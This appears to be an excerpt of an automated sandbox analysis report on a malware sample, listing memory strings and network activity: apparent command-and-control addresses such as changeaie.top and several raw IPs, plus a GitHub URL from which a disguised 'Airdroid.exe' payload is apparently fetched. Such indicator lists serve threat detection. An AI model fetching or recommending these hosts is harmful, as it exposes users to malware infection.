                    Source: Nepomuk.exe, 00000000.00000003.1318339601.0000000003FB8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
                    Source: powershell.exe, 0000000E.00000002.1787556992.00000000005F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micro
                    Source: Nepomuk.exe, 00000000.00000003.1318339601.0000000003FB8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
                    Source: Nepomuk.exe, 00000000.00000003.1318339601.0000000003FB8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
                    Source: Nepomuk.exe, 00000000.00000003.1318339601.0000000003FB8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
                    Source: Nepomuk.exe, 00000000.00000003.1318339601.0000000003FB8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
                    Source: Nepomuk.exe, 00000000.00000003.1318339601.0000000003FB8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
                    Source: powershell.exe, 00000008.00000002.1539712265.0000000006656000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1715113069.0000000005E65000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1799595112.0000000005863000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                    Source: Nepomuk.exe, 00000000.00000003.1318339601.0000000003FB8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
                    Source: Nepomuk.exe, 00000000.00000003.1318339601.0000000003FB8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
                    Source: powershell.exe, 0000000E.00000002.1790189763.0000000004952000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                    Source: powershell.exe, 00000008.00000002.1537699345.00000000055F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1707394033.0000000004E01000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1790189763.0000000004801000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                    Source: powershell.exe, 0000000E.00000002.1790189763.0000000004952000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                    Source: Nepomuk.exe, 00000000.00000003.1318339601.0000000003FB8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
                    Source: Nepomuk.exe, 00000000.00000003.1318339601.0000000003FB8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
                    Source: T68WJ1SM1U30WFLN7XXTLWOX8.exe, 0000000D.00000002.2472257494.0000000004500000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://147.45.196.157:443
                    Source: T68WJ1SM1U30WFLN7XXTLWOX8.exe, 0000000D.00000002.2472257494.0000000004500000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://193.187.172.163:443
                    Source: T68WJ1SM1U30WFLN7XXTLWOX8.exe, 0000000D.00000002.2472257494.000000000450E000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://194.28.226.181:443
                    Source: T68WJ1SM1U30WFLN7XXTLWOX8.exe, 0000000D.00000002.2472257494.000000000450E000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://38.244.132.66:443
                    Source: T68WJ1SM1U30WFLN7XXTLWOX8.exe, 0000000D.00000002.2472257494.0000000004500000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://46.8.232.106:443
                    Source: T68WJ1SM1U30WFLN7XXTLWOX8.exe, 0000000D.00000002.2472257494.0000000004500000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://46.8.236.61:443
                    Source: T68WJ1SM1U30WFLN7XXTLWOX8.exe, 0000000D.00000002.2472257494.00000000044E4000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://91.212.166.19:443
                    Source: T68WJ1SM1U30WFLN7XXTLWOX8.exe, 00000007.00000002.2473280587.00000000048F0000.00000004.00001000.00020000.00000000.sdmp, T68WJ1SM1U30WFLN7XXTLWOX8.exe, 0000000A.00000002.2472321608.000000000492A000.00000004.00001000.00020000.00000000.sdmp, T68WJ1SM1U30WFLN7XXTLWOX8.exe, 0000000D.00000002.2472257494.000000000447C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://91.212.166.19:443Helper
                    Source: T68WJ1SM1U30WFLN7XXTLWOX8.exe, 00000007.00000002.2473280587.00000000048EE000.00000004.00001000.00020000.00000000.sdmp, T68WJ1SM1U30WFLN7XXTLWOX8.exe, 0000000A.00000002.2472321608.000000000497C000.00000004.00001000.00020000.00000000.sdmp, T68WJ1SM1U30WFLN7XXTLWOX8.exe, 0000000A.00000002.2472321608.00000000049C2000.00000004.00001000.00020000.00000000.sdmp, T68WJ1SM1U30WFLN7XXTLWOX8.exe, 0000000A.00000002.2472321608.00000000049C6000.00000004.00001000.00020000.00000000.sdmp, T68WJ1SM1U30WFLN7XXTLWOX8.exe, 0000000D.00000002.2472257494.0000000004510000.00000004.00001000.00020000.00000000.sdmp, T68WJ1SM1U30WFLN7XXTLWOX8.exe, 0000000D.00000002.2480140288.000000000464E000.00000004.00001000.00020000.00000000.sdmp, T68WJ1SM1U30WFLN7XXTLWOX8.exe, 0000000D.00000002.2472257494.000000000450E000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://91.212.166.19:443https://46.8.232.106:443
                    Source: Nepomuk.exe, 00000000.00000003.1294044299.0000000003F28000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org?q=
                    Source: powershell.exe, 00000008.00000002.1537699345.00000000055F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1707394033.0000000004E01000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1790189763.0000000004801000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
                    Source: Nepomuk.exe, 00000000.00000003.1320111232.000000000171C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.
                    Source: Nepomuk.exe, 00000000.00000003.1320111232.000000000171C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta
                    Source: Nepomuk.exe, 00000000.00000003.1294044299.0000000003F28000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                    Source: Nepomuk.exe, 00000000.00000003.1294044299.0000000003F28000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                    Source: Nepomuk.exe, 00000000.00000003.1294044299.0000000003F28000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                    Source: Nepomuk.exe, 00000000.00000003.1471546361.00000000016FB000.00000004.00000020.00020000.00000000.sdmp, Nepomuk.exe, 00000000.00000003.1466853863.00000000016FB000.00000004.00000020.00020000.00000000.sdmp, Nepomuk.exe, 00000000.00000003.1350444440.00000000016F2000.00000004.00000020.00020000.00000000.sdmp, Nepomuk.exe, 00000000.00000003.1350187617.00000000016E1000.00000004.00000020.00020000.00000000.sdmp, Nepomuk.exe, 00000000.00000003.1466457237.00000000016EE000.00000004.00000020.00020000.00000000.sdmp, Nepomuk.exe, 00000000.00000003.1290239149.000000000165E000.00000004.00000020.00020000.00000000.sdmp, Nepomuk.exe, 00000000.00000003.1392168310.00000000016FB000.00000004.00000020.00020000.00000000.sdmp, Nepomuk.exe, 00000000.00000002.1472424116.00000000016FC000.00000004.00000020.00020000.00000000.sdmp, Nepomuk.exe, 00000000.00000003.1359304340.00000000016E1000.00000004.00000020.00020000.00000000.sdmp, Nepomuk.exe, 00000000.00000003.1391276188.00000000016EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://changeaie.top/
                    Source: Nepomuk.exe, 00000000.00000003.1391276188.0000000001700000.00000004.00000020.00020000.00000000.sdmp, Nepomuk.exe, 00000000.00000003.1339797197.00000000016F3000.00000004.00000020.00020000.00000000.sdmp, Nepomuk.exe, 00000000.00000003.1306226789.0000000001710000.00000004.00000020.00020000.00000000.sdmp, Nepomuk.exe, 00000000.00000003.1350444440.00000000016F2000.00000004.00000020.00020000.00000000.sdmp, Nepomuk.exe, 00000000.00000003.1350187617.00000000016E1000.00000004.00000020.00020000.00000000.sdmp, Nepomuk.exe, 00000000.00000003.1318065628.0000000001711000.00000004.00000020.00020000.00000000.sdmp, Nepomuk.exe, 00000000.00000003.1338586135.00000000016F2000.00000004.00000020.00020000.00000000.sdmp, Nepomuk.exe, 00000000.00000003.1359304340.0000000001700000.00000004.00000020.00020000.00000000.sdmp, Nepomuk.exe, 00000000.00000002.1472403308.00000000016F3000.00000004.00000020.00020000.00000000.sdmp, Nepomuk.exe, 00000000.00000003.1317715150.0000000001710000.00000004.00000020.00020000.00000000.sdmp, Nepomuk.exe, 00000000.00000003.1466457237.00000000016EE000.00000004.00000020.00020000.00000000.sdmp, Nepomuk.exe, 00000000.00000003.1317678655.0000000001708000.00000004.00000020.00020000.00000000.sdmp, Nepomuk.exe, 00000000.00000003.1359304340.00000000016E1000.00000004.00000020.00020000.00000000.sdmp, Nepomuk.exe, 00000000.00000003.1329240431.0000000001711000.00000004.00000020.00020000.00000000.sdmp, Nepomuk.exe, 00000000.00000003.1338567920.0000000001711000.00000004.00000020.00020000.00000000.sdmp, Nepomuk.exe, 00000000.00000003.1391276188.00000000016EE000.00000004.00000020.00020000.00000000.sdmp, Nepomuk.exe, 00000000.00000003.1305853226.0000000001710000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://changeaie.top/geps
                    Source: Nepomuk.exe, 00000000.00000003.1317696538.000000000171D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://changeaie.top/geps5
                    Source: Nepomuk.exe, 00000000.00000003.1471096945.00000000016E1000.00000004.00000020.00020000.00000000.sdmp, Nepomuk.exe, 00000000.00000002.1472383126.00000000016E3000.00000004.00000020.00020000.00000000.sdmp, Nepomuk.exe, 00000000.00000003.1466512578.00000000016DD000.00000004.00000020.00020000.00000000.sdmp, Nepomuk.exe, 00000000.00000003.1359304340.00000000016E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://changeaie.top/gepsCO.
                    Source: Nepomuk.exe, 00000000.00000002.1472403308.00000000016F3000.00000004.00000020.00020000.00000000.sdmp, Nepomuk.exe, 00000000.00000003.1466457237.00000000016EE000.00000004.00000020.00020000.00000000.sdmp, Nepomuk.exe, 00000000.00000003.1359304340.00000000016E1000.00000004.00000020.00020000.00000000.sdmp, Nepomuk.exe, 00000000.00000003.1391276188.00000000016EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://changeaie.top/gepsO
                    Source: Nepomuk.exe, 00000000.00000003.1350444440.0000000001700000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://changeaie.top/gepsZ
                    Source: Nepomuk.exe, 00000000.00000003.1339797197.00000000016F3000.00000004.00000020.00020000.00000000.sdmp, Nepomuk.exe, 00000000.00000003.1350444440.00000000016F2000.00000004.00000020.00020000.00000000.sdmp, Nepomuk.exe, 00000000.00000003.1350187617.00000000016E1000.00000004.00000020.00020000.00000000.sdmp, Nepomuk.exe, 00000000.00000003.1338586135.00000000016F2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://changeaie.top/gepse0R
                    Source: Nepomuk.exe, 00000000.00000003.1471096945.00000000016E1000.00000004.00000020.00020000.00000000.sdmp, Nepomuk.exe, 00000000.00000002.1472383126.00000000016E3000.00000004.00000020.00020000.00000000.sdmp, Nepomuk.exe, 00000000.00000003.1466512578.00000000016DD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://changeaie.top/gepsj
                    Source: Nepomuk.exe, 00000000.00000003.1329303038.000000000171D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://changeaie.top/gepslite5
                    Source: Nepomuk.exe, 00000000.00000003.1339975888.0000000001679000.00000004.00000020.00020000.00000000.sdmp, Nepomuk.exe, 00000000.00000003.1339840144.0000000001676000.00000004.00000020.00020000.00000000.sdmp, Nepomuk.exe, 00000000.00000003.1471333634.0000000001678000.00000004.00000020.00020000.00000000.sdmp, Nepomuk.exe, 00000000.00000003.1471118429.0000000001676000.00000004.00000020.00020000.00000000.sdmp, Nepomuk.exe, 00000000.00000003.1350308080.0000000001678000.00000004.00000020.00020000.00000000.sdmp, Nepomuk.exe, 00000000.00000003.1391450964.000000000167A000.00000004.00000020.00020000.00000000.sdmp, Nepomuk.exe, 00000000.00000003.1466589569.0000000001676000.00000004.00000020.00020000.00000000.sdmp, Nepomuk.exe, 00000000.00000002.1472216522.000000000167A000.00000004.00000020.00020000.00000000.sdmp, Nepomuk.exe, 00000000.00000003.1289528214.0000000001682000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://changeaie.top/gepsoh
                    Source: Nepomuk.exe, 00000000.00000003.1392168310.00000000016FB000.00000004.00000020.00020000.00000000.sdmp, Nepomuk.exe, 00000000.00000003.1359304340.00000000016E1000.00000004.00000020.00020000.00000000.sdmp, Nepomuk.exe, 00000000.00000003.1391276188.00000000016EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://changeaie.top/n
                    Source: Nepomuk.exe, 00000000.00000003.1320111232.000000000171C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg
                    Source: Nepomuk.exe, 00000000.00000003.1320111232.000000000171C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
                    Source: powershell.exe, 0000000E.00000002.1799595112.0000000005863000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                    Source: powershell.exe, 0000000E.00000002.1799595112.0000000005863000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                    Source: powershell.exe, 0000000E.00000002.1799595112.0000000005863000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                    Source: Nepomuk.exe, 00000000.00000003.1294044299.0000000003F28000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                    Source: Nepomuk.exe, 00000000.00000003.1294044299.0000000003F28000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtabv20
                    Source: Nepomuk.exe, 00000000.00000003.1294044299.0000000003F28000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                    Source: Nepomuk.exe, 00000000.00000003.1294044299.0000000003F28000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://gemini.google.com/app?q=
                    Source: Nepomuk.exe, 00000000.00000003.1471465153.00000000016D1000.00000004.00000020.00020000.00000000.sdmp, Nepomuk.exe, 00000000.00000003.1471118429.000000000169F000.00000004.00000020.00020000.00000000.sdmp, Nepomuk.exe, 00000000.00000003.1466589569.000000000169F000.00000004.00000020.00020000.00000000.sdmp, Nepomuk.exe, 00000000.00000002.1472362154.00000000016D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/
                    Source: Nepomuk.exe, 00000000.00000003.1471465153.00000000016D1000.00000004.00000020.00020000.00000000.sdmp, Nepomuk.exe, 00000000.00000003.1471118429.000000000169F000.00000004.00000020.00020000.00000000.sdmp, Nepomuk.exe, 00000000.00000003.1466589569.000000000169F000.00000004.00000020.00020000.00000000.sdmp, Nepomuk.exe, 00000000.00000002.1472362154.00000000016D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/DLMKER/Ler
                    Source: Nepomuk.exe, 00000000.00000002.1471840369.000000000135B000.00000004.00000010.00020000.00000000.sdmp, Nepomuk.exe, 00000000.00000003.1471118429.000000000169F000.00000004.00000020.00020000.00000000.sdmp, Nepomuk.exe, 00000000.00000002.1472501025.0000000001713000.00000004.00000020.00020000.00000000.sdmp, Nepomuk.exe, 00000000.00000003.1466589569.000000000169F000.00000004.00000020.00020000.00000000.sdmp, Nepomuk.exe, 00000000.00000003.1466407094.000000000170C000.00000004.00000020.00020000.00000000.sdmp, Nepomuk.exe, 00000000.00000002.1472216522.000000000169F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/DLMKER/LeryStable/raw/refs/heads/main/Airdroid.exe
                    Source: Nepomuk.exe, 00000000.00000003.1471096945.00000000016E1000.00000004.00000020.00020000.00000000.sdmp, Nepomuk.exe, 00000000.00000002.1472383126.00000000016E3000.00000004.00000020.00020000.00000000.sdmp, Nepomuk.exe, 00000000.00000003.1466512578.00000000016DD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/DLMKER/LeryStable/raw/refs/heads/main/Airdroid.exeK&
                    Source: Nepomuk.exe, 00000000.00000002.1472501025.0000000001713000.00000004.00000020.00020000.00000000.sdmp, Nepomuk.exe, 00000000.00000003.1466407094.000000000170C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/DLMKER/LeryStable/raw/refs/heads/main/Airdroid.exei
                    Source: Nepomuk.exe, 00000000.00000003.1471118429.000000000169F000.00000004.00000020.00020000.00000000.sdmp, Nepomuk.exe, 00000000.00000003.1466589569.000000000169F000.00000004.00000020.00020000.00000000.sdmp, Nepomuk.exe, 00000000.00000002.1472216522.000000000169F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/DLMKER/LeryStable/raw/refs/heads/main/Airdroid.exetSbTskZp5lIVJvOyFmmmUkUmI7
                    Source: powershell.exe, 0000000E.00000002.1790189763.0000000004952000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                    Source: Nepomuk.exe, 00000000.00000003.1320111232.000000000171C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi
                    Source: powershell.exe, 00000008.00000002.1539712265.0000000006656000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1715113069.0000000005E65000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1799595112.0000000005863000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                    Source: Nepomuk.exe, 00000000.00000003.1471096945.00000000016E1000.00000004.00000020.00020000.00000000.sdmp, Nepomuk.exe, 00000000.00000002.1472383126.00000000016E3000.00000004.00000020.00020000.00000000.sdmp, Nepomuk.exe, 00000000.00000003.1466512578.00000000016DD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/$
                    Source: Nepomuk.exe, 00000000.00000003.1466158005.0000000003F53000.00000004.00000800.00020000.00000000.sdmp, Nepomuk.exe, 00000000.00000003.1466808297.00000000016FE000.00000004.00000020.00020000.00000000.sdmp, Nepomuk.exe, 00000000.00000003.1471118429.000000000169F000.00000004.00000020.00020000.00000000.sdmp, Nepomuk.exe, 00000000.00000003.1471485052.000000000165E000.00000004.00000020.00020000.00000000.sdmp, Nepomuk.exe, 00000000.00000002.1472145956.000000000165E000.00000004.00000020.00020000.00000000.sdmp, Nepomuk.exe, 00000000.00000003.1471333634.0000000001678000.00000004.00000020.00020000.00000000.sdmp, Nepomuk.exe, 00000000.00000003.1470890253.0000000003F87000.00000004.00000800.00020000.00000000.sdmp, Nepomuk.exe, 00000000.00000003.1471118429.0000000001676000.00000004.00000020.00020000.00000000.sdmp, Nepomuk.exe, 00000000.00000003.1466457237.00000000016EE000.00000004.00000020.00020000.00000000.sdmp, Nepomuk.exe, 00000000.00000002.1473525877.0000000003F89000.00000004.00000800.00020000.00000000.sdmp, Nepomuk.exe, 00000000.00000003.1466589569.000000000169F000.00000004.00000020.00020000.00000000.sdmp, Nepomuk.exe, 00000000.00000002.1472216522.000000000169F000.00000004.00000020.00020000.00000000.sdmp, Nepomuk.exe, 00000000.00000003.1466589569.000000000165E000.00000004.00000020.00020000.00000000.sdmp, Nepomuk.exe, 00000000.00000002.1472216522.000000000167A000.00000004.00000020.00020000.00000000.sdmp, Nepomuk.exe, 00000000.00000002.1472424116.00000000016FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/DLMKER/LeryStable/refs/heads/main/Airdroid.exe
                    Source: Nepomuk.exe, 00000000.00000003.1466589569.0000000001676000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/DLMKER/LeryStable/refs/heads/main/Airdroid.exe&
                    Source: Nepomuk.exe, 00000000.00000003.1471485052.000000000165E000.00000004.00000020.00020000.00000000.sdmp, Nepomuk.exe, 00000000.00000002.1472145956.000000000165E000.00000004.00000020.00020000.00000000.sdmp, Nepomuk.exe, 00000000.00000003.1466589569.000000000165E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/DLMKER/LeryStable/refs/heads/main/Airdroid.exeLeryStable/refs/head
                    Source: Nepomuk.exe, 00000000.00000003.1466158005.0000000003FEE000.00000004.00000800.00020000.00000000.sdmp, Nepomuk.exe, 00000000.00000003.1466378385.0000000003FEF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com:443/DLMKER/LeryStable/refs/heads/main/Airdroid.exe
                    Source: Nepomuk.exe, 00000000.00000003.1319806754.000000000403D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                    Source: Nepomuk.exe, 00000000.00000003.1319806754.000000000403D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
                    Source: Nepomuk.exe, 00000000.00000003.1320111232.000000000171C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94
                    Source: Nepomuk.exe, 00000000.00000003.1294044299.0000000003F28000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/v20
                    Source: Nepomuk.exe, 00000000.00000003.1320111232.000000000171C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.expedia.com/?locale=en_US&siteid=1&semcid=US.UB.ADMARKETPLACE.GT-C-EN.HOTEL&SEMDTL=a1219
                    Source: Nepomuk.exe, 00000000.00000003.1294044299.0000000003F28000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_alldp.ico
                    Source: Nepomuk.exe, 00000000.00000003.1319806754.000000000403D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
                    Source: Nepomuk.exe, 00000000.00000003.1319806754.000000000403D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
                    Source: Nepomuk.exe, 00000000.00000003.1319806754.000000000403D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
                    Source: Nepomuk.exe, 00000000.00000003.1319806754.000000000403D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                    Source: Nepomuk.exe, 00000000.00000003.1319806754.000000000403D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
